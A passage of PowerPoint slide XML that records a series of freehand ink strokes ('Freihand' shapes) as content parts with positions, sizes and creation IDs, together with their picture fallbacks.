                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10075966" y="3073274"/>
                <a:ext cx="105120" cy="108360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="134" name="Freihand 133">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D62FAF4E-6A3B-4C5B-AFD3-A7FAAD1EAA3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067326" y="3064274"/>
                  <a:ext cx="122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5" name="Freihand 134">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8D1DE2-2E0A-4397-AFE8-BD7D3862392A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10219606" y="3085874"/>
                <a:ext cx="143640" cy="92880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="135" name="Freihand 134">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8D1DE2-2E0A-4397-AFE8-BD7D3862392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210606" y="3077234"/>
                  <a:ext cx="161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36" name="Freihand 135">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9409F6C6-FEAE-4A6A-A439-3D3EE507F0D6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10399246" y="2992634"/>
                <a:ext cx="103680" cy="170640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="136" name="Freihand 135">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9409F6C6-FEAE-4A6A-A439-3D3EE507F0D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390606" y="2983634"/>
                  <a:ext cx="121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37" name="Freihand 136">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCA1DB2-5202-4A4F-A405-549276F6DC3D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10553686" y="3084074"/>
                <a:ext cx="77400" cy="82440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="137" name="Freihand 136">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCA1DB2-5202-4A4F-A405-549276F6DC3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545046" y="3075074"/>
                  <a:ext cx="95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38" name="Freihand 137">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2AC053-2943-4F58-B78B-AE989DD85488}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10654126" y="3003434"/>
                <a:ext cx="174960" cy="15444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4C2AC053-2943-4F58-B78B-AE989DD8548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645126" y="2994434"/>
                  <a:ext cx="192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0" name="Freihand 139">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780F7A66-8803-4CD7-B26B-31F995521986}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10932046" y="3043394"/>
                <a:ext cx="106560" cy="130680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="140" name="Freihand 139">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780F7A66-8803-4CD7-B26B-31F99552198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923046" y="3034394"/>
                  <a:ext cx="124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2" name="Freihand 141">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EEC4576-147B-4223-96F9-4CB4EEF42346}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11081806" y="3038354"/>
                <a:ext cx="77400" cy="77040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="142" name="Freihand 141">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EEC4576-147B-4223-96F9-4CB4EEF4234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072806" y="3029354"/>
                  <a:ext cx="95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3" name="Freihand 142">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08207BC9-F8D4-4A1E-8D7D-C1716367A671}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11169286" y="3053474"/>
                <a:ext cx="16560" cy="68040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="143" name="Freihand 142">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08207BC9-F8D4-4A1E-8D7D-C1716367A67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160646" y="3044474"/>
                  <a:ext cx="34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4" name="Freihand 143">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA779DC-9A46-40F5-8E4D-1C99F487322D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11220406" y="3044834"/>
                <a:ext cx="62280" cy="39600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="144" name="Freihand 143">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA779DC-9A46-40F5-8E4D-1C99F487322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211406" y="3035834"/>
                  <a:ext cx="79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5" name="Freihand 144">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53059599-EAF6-4744-BF3E-18B6E6898ECD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11216446" y="3055634"/>
                <a:ext cx="93600" cy="120600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="145" name="Freihand 144">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53059599-EAF6-4744-BF3E-18B6E6898EC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207446" y="3046994"/>
                  <a:ext cx="111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749C88E7-C66E-48A5-90B1-425C26737A78}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11344246" y="2948714"/>
                <a:ext cx="70560" cy="161640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="146" name="Freihand 145">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{749C88E7-C66E-48A5-90B1-425C26737A7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335246" y="2940074"/>
                  <a:ext cx="88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0C6B4231-BE2A-40F2-B611-A6BA029E2F2F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11414086" y="3046634"/>
                <a:ext cx="86040" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="147" name="Freihand 146">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C6B4231-BE2A-40F2-B611-A6BA029E2F2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405446" y="3037634"/>
                  <a:ext cx="1036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49" name="Freihand 148">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8961D64-6F35-4DDF-A09C-C6677E4D6DEE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11554126" y="3038714"/>
                <a:ext cx="63360" cy="59400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="149" name="Freihand 148">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8961D64-6F35-4DDF-A09C-C6677E4D6DE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545126" y="3029714"/>
                  <a:ext cx="81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0" name="Freihand 149">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17757810-B29B-455D-B410-0BF2FCDB0F89}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11616046" y="3052034"/>
                <a:ext cx="50760" cy="76320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="150" name="Freihand 149">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17757810-B29B-455D-B410-0BF2FCDB0F8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607046" y="3043034"/>
                  <a:ext cx="684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1" name="Freihand 150">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95F6241A-E972-4262-86D8-F0C1BF40511E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11666446" y="3048434"/>
                <a:ext cx="84600" cy="72360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="151" name="Freihand 150">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95F6241A-E972-4262-86D8-F0C1BF40511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657806" y="3039434"/>
                  <a:ext cx="102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BDA0CDED-A918-4A7F-B927-6DBCDEA5EE41}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11747806" y="2942234"/>
                <a:ext cx="57960" cy="163800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="152" name="Freihand 151">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDA0CDED-A918-4A7F-B927-6DBCDEA5EE4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738806" y="2933594"/>
                  <a:ext cx="7560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3F0BA190-5CFD-46F3-A381-95328ACE65ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5064046" y="3459194"/>
            <a:ext cx="233640" cy="161640"/>
            <a:chOff x="5064046" y="3459194"/>
            <a:chExt cx="23364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4" name="Freihand 153">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB43EC7-031E-4272-87AE-47F3E896A797}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5064046" y="3459194"/>
                <a:ext cx="138240" cy="129240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="154" name="Freihand 153">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB43EC7-031E-4272-87AE-47F3E896A79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055046" y="3450554"/>
                  <a:ext cx="155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5" name="Freihand 154">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA4AFF5-4A6D-457C-A614-D3A257BFEF70}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5149366" y="3507434"/>
                <a:ext cx="23760" cy="113400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="155" name="Freihand 154">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA4AFF5-4A6D-457C-A614-D3A257BFEF7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140366" y="3498434"/>
                  <a:ext cx="41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6" name="Freihand 155">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA0C55F7-83FE-4029-A8E3-DBB4A18CD375}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5285806" y="3598874"/>
                <a:ext cx="11880" cy="7200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="156" name="Freihand 155">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA0C55F7-83FE-4029-A8E3-DBB4A18CD37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276806" y="3590234"/>
                  <a:ext cx="2952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uppieren 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1F305B-981E-4EC0-A5B8-E17E173C81BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5358886" y="3316634"/>
            <a:ext cx="2440080" cy="349920"/>
            <a:chOff x="5358886" y="3316634"/>
            <a:chExt cx="244008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FA45E72D-5E67-4C91-A73A-E6CA3CC426F0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5358886" y="3529034"/>
                <a:ext cx="81720" cy="9108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FA45E72D-5E67-4C91-A73A-E6CA3CC426F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349886" y="3520034"/>
                  <a:ext cx="99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10ECF6C1-6978-4065-A10C-0CAFD8EEC616}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5436286" y="3529034"/>
                <a:ext cx="105120" cy="8100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10ECF6C1-6978-4065-A10C-0CAFD8EEC61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427646" y="3520394"/>
                  <a:ext cx="122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F53BF492-2057-4E26-B342-F170D3D3771B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5572006" y="3404834"/>
                <a:ext cx="66600" cy="24912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F53BF492-2057-4E26-B342-F170D3D3771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63006" y="3395834"/>
                  <a:ext cx="84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46B0F426-AFB4-47E5-8008-E98F8E8A0247}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5537086" y="3504194"/>
                <a:ext cx="85680" cy="2340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46B0F426-AFB4-47E5-8008-E98F8E8A024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528446" y="3495194"/>
                  <a:ext cx="103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3" name="Freihand 172">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60F3E6B-6604-47E2-9B06-E662AA05C715}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5660926" y="3406994"/>
                <a:ext cx="74880" cy="174960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="173" name="Freihand 172">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60F3E6B-6604-47E2-9B06-E662AA05C71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51926" y="3398354"/>
                  <a:ext cx="92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3C598CA4-B450-4291-BEB6-20E05A3E0B13}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5754526" y="3503474"/>
                <a:ext cx="55440" cy="7596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3C598CA4-B450-4291-BEB6-20E05A3E0B1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745526" y="3494474"/>
                  <a:ext cx="73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68595295-C596-48F8-8F15-1193D02307D6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5855326" y="3489794"/>
                <a:ext cx="82080" cy="64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68595295-C596-48F8-8F15-1193D02307D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46326" y="3481154"/>
                  <a:ext cx="99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935DCADF-D494-4F2C-88E1-44DCA73AB0A1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5952166" y="3395474"/>
                <a:ext cx="35280" cy="1666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935DCADF-D494-4F2C-88E1-44DCA73AB0A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943526" y="3386834"/>
                  <a:ext cx="52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7" name="Freihand 176">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47CF2D7F-8189-4097-A306-60529FF93396}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5921206" y="3478274"/>
                <a:ext cx="89640" cy="23040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="177" name="Freihand 176">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47CF2D7F-8189-4097-A306-60529FF9339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12566" y="3469274"/>
                  <a:ext cx="107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797FCC47-3845-4EE8-98BD-9D1313C60B33}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6091846" y="3497714"/>
                <a:ext cx="97200" cy="16884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797FCC47-3845-4EE8-98BD-9D1313C60B3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83206" y="3489074"/>
                  <a:ext cx="114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C1738823-F550-4F75-8BA9-467E77F0A315}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6228286" y="3498794"/>
                <a:ext cx="114840" cy="8064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C1738823-F550-4F75-8BA9-467E77F0A31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219646" y="3489794"/>
                  <a:ext cx="132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1" name="Freihand 180">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B4EC8F-FBB8-40AA-8CBC-99EEBC164B22}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6347086" y="3480794"/>
                <a:ext cx="123840" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="181" name="Freihand 180">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B4EC8F-FBB8-40AA-8CBC-99EEBC164B2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38086" y="3472154"/>
                  <a:ext cx="141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63D94BD3-3036-4744-AEA6-43DCF04B9147}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6506926" y="3380714"/>
                <a:ext cx="62280" cy="16848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63D94BD3-3036-4744-AEA6-43DCF04B914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498286" y="3372074"/>
                  <a:ext cx="79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3" name="Freihand 182">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB408BAD-2879-4545-87F9-7755BFCF6D7E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6576766" y="3491954"/>
                <a:ext cx="84960" cy="61200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="183" name="Freihand 182">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB408BAD-2879-4545-87F9-7755BFCF6D7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568126" y="3483314"/>
                  <a:ext cx="102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C9F6DA06-058E-4CE9-9AFF-1ADEED4514DF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6693046" y="3455954"/>
                <a:ext cx="67320" cy="8136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C9F6DA06-058E-4CE9-9AFF-1ADEED4514D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684046" y="3447314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5" name="Freihand 184">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE4EFD0-84A1-4255-8AF6-23C30AC11068}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6780166" y="3467834"/>
                <a:ext cx="84240" cy="70560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="185" name="Freihand 184">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE4EFD0-84A1-4255-8AF6-23C30AC1106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71166" y="3459194"/>
                  <a:ext cx="1018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6" name="Freihand 185">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5250FBE4-8708-412A-BADC-DC2C231E0269}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6875206" y="3374234"/>
                <a:ext cx="23400" cy="133200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="186" name="Freihand 185">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5250FBE4-8708-412A-BADC-DC2C231E026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866206" y="3365594"/>
                  <a:ext cx="41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7" name="Freihand 186">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ACC52D-E734-43A8-9DA1-630C51AA5FB8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
